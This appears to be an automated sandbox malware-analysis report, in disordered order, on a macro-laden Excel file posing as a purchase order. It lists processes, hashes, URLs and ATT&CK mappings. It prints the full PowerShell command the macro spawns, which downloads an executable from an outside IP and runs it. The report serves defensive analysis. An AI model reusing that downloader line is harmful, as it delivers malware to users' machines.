Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2812	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1232	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1232	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1164	Thread sleep time: -120000s >= -30000s	Jump to behavior

Source: explorer.exe, 00000005.00000002.676532015.0000000000870000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000002.676532015.0000000000870000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: explorer.exe, 00000005.00000002.676532015.0000000000870000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Command and Scripting Interpreter11	Path Interception	Process Injection12	Masquerading1	OS Credential Dumping	Security Software Discovery1	Remote Services	Data from Local System1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion21	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution1	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Virtualization/Sandbox Evasion21	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Scripting1	NTDS	File and Directory Discovery12	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	System Information Discovery13	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Source	Detection	Scanner	Label	Link
purchase Order.xlsm	22%	Virustotal		Browse
purchase Order.xlsm	100%	Avira	W2000M/YAV.Minerva.ssocv

Source	Detection	Scanner	Label
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://212.192.241.75/sam/new3.exe-OutFile$env:public	0%	Avira URL Cloud	safe
http://212.192.241.75/sam/new3.exeu	0%	Avira URL Cloud	safe
http://212.192.241.75/sam/new3.exe1.0a.	0%	Avira URL Cloud	safe
http://212.192.241.75/sam/new3.exePE	0%	Avira URL Cloud	safe
http://212.192.2	0%	Avira URL Cloud	safe
http://212.192.241.75/sam/new3.e	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://212.192.241.75/sam/new3.exe	0%	Avira URL Cloud	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe

Name	Source	Malicious	Antivirus Detection	Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	explorer.exe, 00000005.00000002.677616908.0000000003977000.00000002.00020000.sdmp	false		high
http://www.windows.com/pctv.	explorer.exe, 00000005.00000002.677428741.0000000003790000.00000002.00020000.sdmp	false		high
http://investor.msn.com	explorer.exe, 00000005.00000002.677428741.0000000003790000.00000002.00020000.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	explorer.exe, 00000005.00000002.677428741.0000000003790000.00000002.00020000.sdmp	false		high
http://www.icra.org/vocabulary/.	explorer.exe, 00000005.00000002.677616908.0000000003977000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	powershell.exe, 00000002.00000002.425523815.00000000024B0000.00000002.00020000.sdmp, explorer.exe, 00000004.00000002.428542595.0000000001CE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000002.676730998.0000000001E30000.00000002.00020000.sdmp	false		high
http://212.192.241.75/sam/new3.exe-OutFile$env:public	powershell.exe, 00000002.00000002.425171182.0000000000220000.00000004.00000020.sdmp, powershell.exe, 00000002.00000002.425250143.0000000000444000.00000004.00000040.sdmp, powershell.exe, 00000002.00000002.425295083.0000000001BA6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://212.192.241.75/sam/new3.exeu	powershell.exe, 00000002.00000002.425171182.0000000000220000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://investor.msn.com/	explorer.exe, 00000005.00000002.677428741.0000000003790000.00000002.00020000.sdmp	false		high
http://212.192.241.75/sam/new3.exe1.0a.	powershell.exe, 00000002.00000002.425171182.0000000000220000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://212.192.241.75/sam/new3.exePE	powershell.exe, 00000002.00000002.430234391.000000000373D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://212.192.2	powershell.exe, 00000002.00000002.430234391.000000000373D000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	low
http://212.192.241.75/sam/new3.e	powershell.exe, 00000002.00000002.430234391.000000000373D000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://www.%s.comPA	powershell.exe, 00000002.00000002.425523815.00000000024B0000.00000002.00020000.sdmp, explorer.exe, 00000004.00000002.428542595.0000000001CE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000002.676730998.0000000001E30000.00000002.00020000.sdmp	false	URL Reputation: safe	low
http://212.192.241.75/sam/new3.exe	powershell.exe, 00000002.00000002.426079549.0000000002D91000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	explorer.exe, 00000005.00000002.677616908.0000000003977000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.hotmail.com/oe	explorer.exe, 00000005.00000002.677428741.0000000003790000.00000002.00020000.sdmp	false		high

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	510341
Start date:	27.10.2021
Start time:	18:07:47
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	purchase Order.xlsm
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal64.expl.winXLSM@6/7@0/0
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 1 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsm Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtEnumerateKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Time	Type	Description
18:08:24	API Interceptor	26x Sleep call for process: powershell.exe modified
18:08:27	API Interceptor	860x Sleep call for process: explorer.exe modified

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2B987DBE.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1064 x 513, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	139201
Entropy (8bit):	7.98388222737656
Encrypted:	false
SSDEEP:	3072:sWeriTte82+uLBcTvJxsQW6I6Aft9RBwcbKYWyFA6yO:sWUMdF+Bcli6I37RBwcblAa
MD5:	1007F58193E382DA00B74BD59C5AD1AD
SHA1:	CBC27D302892B57019FCBD076ACEC67541B7C5A1
SHA-256:	E5AFDB4BF82680681770132A53E16ED3341311D05BEB718AC0239B0D08B97218
SHA-512:	65339D06D22255D2C6E42A0EF1B64EECD99509FD54A7E9EDBB899C1AEC0722DDAEB41462888387F95ED3135EC542900F3944793E2D658D9F1FEA8CA0345CEC28
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...(............8....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs..........o.d....tIME.....'........IDATx...w...u..?U=.X..A$..H.$.,.LQ9[.. [...u......}..%[...E.").$f...."g.9.b.t...4.3...@.!....]9........A@@.B.Z.........a.o>.....,.K...}.!.>.e......r.1!.Q.......F..t.P.0.6a......c..J./..D.D........J..BG..w.1........([CD.Z..uy..1...y`..@)...: .....B...nc1&./...J........I\K.AP"(.....q,5...F...t.F.A!@.D..H.}7.qe.@;..G..........D.....!4.....a.LoO.n........A........VB..(..J)JJE..B}}}.0....R..T.]G.\|.L'.+R....JW.c...a.b.Z.....r.7y.K.b.v.....(..b.,....w:(N....z{..W...>.m7.kK..\|....?..`.1U...._u.?._...H....J.h;...../9...>..H.....`L..0....A..n.{.j.v. .v..[o..@W.......k...(."..1&.S..~....;....#.\|./..w=....../._c..."2n.0..RJ...v.Sn...{.~.l.m"qC&...v<...U.Ra.{*ey......0F......V)..;=n....r....P..A...+...#_k....m.R.)5F..Y..y...A"BhL}...'E.D5...1dBc.[?...[G..G<......O0..u..$....'....].N....../.A.x.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy) Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.580661409163492
Encrypted:	false
SSDEEP:	96:chQCcMqEqvsqvJCwoR4z8hQCcMqEqvsEHyqvJCworT4zIuYBHG4WDh/lUVP4A2:ciNoR4z8iVHnorT4zIi4WDhg4A2
MD5:	76C9CAF04E2F94D16969BDCC015D2736
SHA1:	11D5D36EEA31684EFA59BAEFFFC220BD6BF88143
SHA-256:	F1BE95AF03D3FAAA1E264594DDDF096DA7652CE69F7F176FCCC9462E8174D2F8
SHA-512:	FF062F1660B828A9A0E5C03FC37E374B994B2947B0F1144DCDEA11AFC5E5789872770256579F3E91BA8D8B3FA4AEFE5CC28255BD7625EC66A390FB3B1055C18D
Malicious:	false
Reputation:	low
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S"....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report purchase Order.xlsm

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Initial Sample

Memory Dumps

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

System Summary:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: EXCEL.EXE PID: 1708 Parent PID: 596

General

Chronological Activities

Analysis Process: powershell.exe PID: 1444 Parent PID: 1708

General

Chronological Activities

Analysis Process: explorer.exe PID: 2712 Parent PID: 1444

General

Chronological Activities

Analysis Process: explorer.exe PID: 2416 Parent PID: 596

General

General
File type:	Microsoft Excel 2007+
Entropy (8bit):	7.959887971852356
TrID:	Excel Microsoft Office Open XML Format document with Macro (51004/1) 51.52% Excel Microsoft Office Open XML Format document (40004/1) 40.40% ZIP compressed archive (8000/1) 8.08%
File name:	purchase Order.xlsm
File size:	150286
MD5:	d1ad5761044b2abb12b78700f1a3a537
SHA1:	7fed2064ae3681227f674608df64ff1d7c45a2ee
SHA256:	8024e6dc8c230782b570a234318ba7b5a72f64ad5a1a3ff81584e080d9338eba
SHA512:	0c6ec74a014e337ce2153e682ed5bbc3c059e5d3b6b2ec90e6ab3c74eeccff055c4c776020441471d6184721b87f5391fe4566cb6e9c7a0f3548816abc57d0ee
SSDEEP:	3072:rEaWeriTte82+uLBcTvJxsQW6I6Aft9RBwcbKYWyFA6y7:rLWUMdF+Bcli6I37RBwcblAP
File Content Preview:	PK..........!.................[Content_Types].xml ...(.........................................................................................................................................................................................................

Start time:	18:08:21
Start date:	27/10/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13ff90000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Start time:	18:08:23
Start date:	27/10/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe
Imagebase:	0x13f9b0000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Start time:	18:08:28
Start date:	27/10/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Imagebase:	0xffa10000
File size:	3229696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre